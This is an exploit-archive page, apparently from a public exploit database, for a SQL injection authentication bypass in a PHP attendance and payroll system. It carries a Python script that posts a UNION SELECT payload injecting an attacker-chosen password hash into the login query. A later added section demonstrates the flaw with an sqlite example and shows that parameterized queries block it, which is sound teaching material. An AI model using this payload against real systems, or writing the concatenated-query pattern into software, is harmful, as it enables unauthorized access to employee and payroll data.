Attendance and payroll system v1.0 sqli authentication bypass Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2022-03-07 | Type : webapps | Platform : php
This exploit / vulnerability, Attendance and payroll system v1.0 sqli authentication bypass, is for educational purposes only; if you use it, you do so at your own risk!
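import sys
import requests
from requests.exceptions import ConnectionError

# index_path and login_path are used below, but their definitions are not
# shown on this page; the values here are placeholders only.
index_path = "<INDEX_PATH>"
login_path = "<LOGIN_PATH>"

# Login form body: the username field closes the quoted string and appends a
# UNION SELECT row carrying a bcrypt hash chosen by the sender.
payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

# Check for arguments
if len(sys.argv) < 2 or '-h' in sys.argv:
    print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")
    sys.exit()

# Bypass Authentication
target = sys.argv[1]
print("[+] Extracting Administrator cookie using SQLi ...")
sess = requests.Session()
try:
    sess.get(target + index_path, headers=headers, verify=False)
    sess.post(target + login_path, data=payload, headers=headers, verify=False)
except ConnectionError:  # the requests exception, not the Python builtin
    print('[-] We were unable to establish a connection')
    sys.exit()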
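
Why a payload of this shape passes a login check, and what stops it, shown as an added example that is not part of the original exploit or the application's code. It assumes the login handler looks up one row by username and verifies the submitted password against that row's hash; the table name `admin`, the PBKDF2 stand-in for bcrypt, and all sample values are constructed for illustration.

```python
import hashlib
import hmac
import sqlite3

# Column list taken from the aliases in the payload on this page.
COLUMNS = "id, username, password, firstname, lastname, photo, created_on"

def hash_pw(password):
    # Stand-in for the application's bcrypt hashing (assumption: stdlib only).
    return hashlib.pbkdf2_hmac("sha256", password.encode(), b"demo-salt", 1000).hex()

def make_db():
    # Constructed in-memory table; the name "admin" is hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE admin ({COLUMNS})")
    db.execute("INSERT INTO admin VALUES (1, 'admin', ?, 'A', 'B', 'a.png', '2018-04-30')",
               (hash_pw("correct horse"),))
    return db

def _check(row, password):
    # The password check trusts whatever row the query produced.
    return row is not None and hmac.compare_digest(row[2], hash_pw(password))

def login_concat(db, username, password):
    # Weak form: the username becomes part of the SQL text, so a quote in it
    # ends the string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM admin WHERE username = '" + username + "'"
    return _check(db.execute(sql).fetchone(), password)

def login_param(db, username, password):
    # Hardened form: the username is bound as data and never parsed as SQL.
    sql = "SELECT * FROM admin WHERE username = ?"
    return _check(db.execute(sql, (username,)).fetchone(), password)

def union_username(password):
    # Same structure as the page's username field: a non-existent user plus a
    # UNION SELECT row whose hash matches a password the sender already knows.
    return ("nobodyhavethisusername' UNION SELECT 1, 'myuser', '" + hash_pw(password)
            + "', 'zzz', 'zzz', 'zzz.php', '2018-04-30' -- ")

if __name__ == "__main__":
    db = make_db()
    crafted = union_username("test")
    print("concatenated query accepts crafted login:", login_concat(db, crafted, "test"))
    print("parameterized query accepts crafted login:", login_param(db, crafted, "test"))
```

With the bound parameter the crafted string is just an unknown username, so no row comes back and hash verification never sees attacker-supplied data.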